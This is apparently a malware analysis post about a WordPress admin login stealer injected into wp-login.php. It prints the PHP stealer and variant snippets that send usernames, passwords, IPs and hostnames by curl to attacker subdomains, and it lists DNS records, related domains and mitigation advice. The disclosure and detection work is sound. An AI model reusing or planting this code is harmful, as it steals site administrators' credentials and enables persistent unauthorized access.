WordPress Admin Login Stealer

During an investigation, we identified a WordPress login stealer using the PHP functions curl and file_get_contents. The malicious code was injected into the core file wp-login.php to intercept the information of a valid user and send it to the attacker.

The script gathers the site URL, IP, username and password details, then sends them to the remote site via curl.

$url="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
$ip=$_SERVER['REMOTE_ADDR'];
$ccc_url=base64_decode("aHR0cDovLzEuc2FsZWZvcnlvdS5vcmcvdG9uZy9wYS9uZXdwdy9wYXNzLnBocD9hZG1pbmlwPQ").base64_encode($ip)."&host=".base64_encode($url)."&name=".base64_encode($_POST['log'])."&password=".base64_encode($_POST['pwd']);
$ccc=@file_get_contents($ccc_url);
if(empty($ccc)){function get_pass_Html($url){$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, 1);
curl_setopt ($ch, CURLOPT_TIMEOUT, 2);
curl_exec($ch);
curl_close($ch);
return true;
}
get_pass_Html($ccc_url);
}
setcookie("whatsup","whatsupman",time()+3600*24*365);

Further analysis reveals that the base64 encoded string in this malicious script is actually the attacker’s URL:

hxxp://[1].saleforyou[.]org/tong/pa/newpw/pass.php?adminip=

Here is the information sent via curl:

hxxp://1[.]saleforyou[.]org/tong/pa/newpw/pass.php?adminip=$ip&host=$url&name=$_POST['log']&password=$_POST['pwd']

Malware Variants & Sub-Domains

This login stealing malware appears to have been distributed and used on other websites for about a year now. The same top-level domain has also been seen in other malware variations, but uses a different subdomain: 5[.]saleforyou[.]org

GET_Html('http://5[.]saleforyou[.]org/ming/exam/main.php?key='.$_GET['exam']."&host=".$_SERVER['HTTP_HOST']."&www=".$www);

Another variation also appears to be collecting server IP and HTTP_HOST using a different URL on the same domain:

curl_init();$timeout = 5;curl_setopt ($ch, CURLOPT_URL, $url);curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$content = curl_exec($ch);curl_close($ch);}return $content;}$jturl = "http://1[.]saleforyou[.]org/tong/get/htc/1.php?adminip=".$server_ip."&host=".$_SERVER['HTTP_HOST'];

saleforyou[.]org. 300 IN A 23.88.229.79 \ Enzu Inc.
1.saleforyou[.]org. 300 IN A 172.246.126.170 \ Enzu Inc.
2.saleforyou[.]org. 300 IN A 192.157.233.59 \ Enzu Inc.
3.saleforyou[.]org. 300 IN A 192.157.233.176 \ Enzu Inc.
4.saleforyou[.]org. 300 IN A 23.89.201.143 \ Enzu Inc.
5.saleforyou[.]org. 300 IN A 144.208.127.115 \ Shock Hosting LLC
6.saleforyou[.]org. 300 IN A 208.123.119.189 \ Shock Hosting LLC

It looks like Enzu Inc. has a long history of facilitating malware, spam, and general abuse; their IPs are listed in Stop Badware’s top 50 lists:

Each subdomain is being used for a different campaign, with some hosted on different servers — and even different datacenters.

Related Domains

Another domain, bingstyle[.]com, appears to be related. Attackers are using a similar URL structure for malicious files: tong/pa/pass.php

bingstyle[.]com. 300 IN A 104.31.70.141
bingstyle[.]com. 300 IN A 104.31.71.141

These Virustotal results suggest a relationship to saleforyou[.]org, or at least the same group: https://www.virustotal.com/gui/domain/bingstyle.com/relations

Unfortunately, bingstyle[.]com is using CloudFlare and we are unable to tell exactly where it’s hosted.

Mitigation Steps

Login credential stealers like this one can easily be used as a backdoor to maintain unauthorized access to a website long after the initial infection. The malicious script will simply continue to send the stolen login credentials to the attacker until it is removed from the compromised environment.

To catch these types of infections, set up and maintain a file monitoring system to alert you to any changes in your core WordPress files and detect malicious activity along with other indicators of compromise.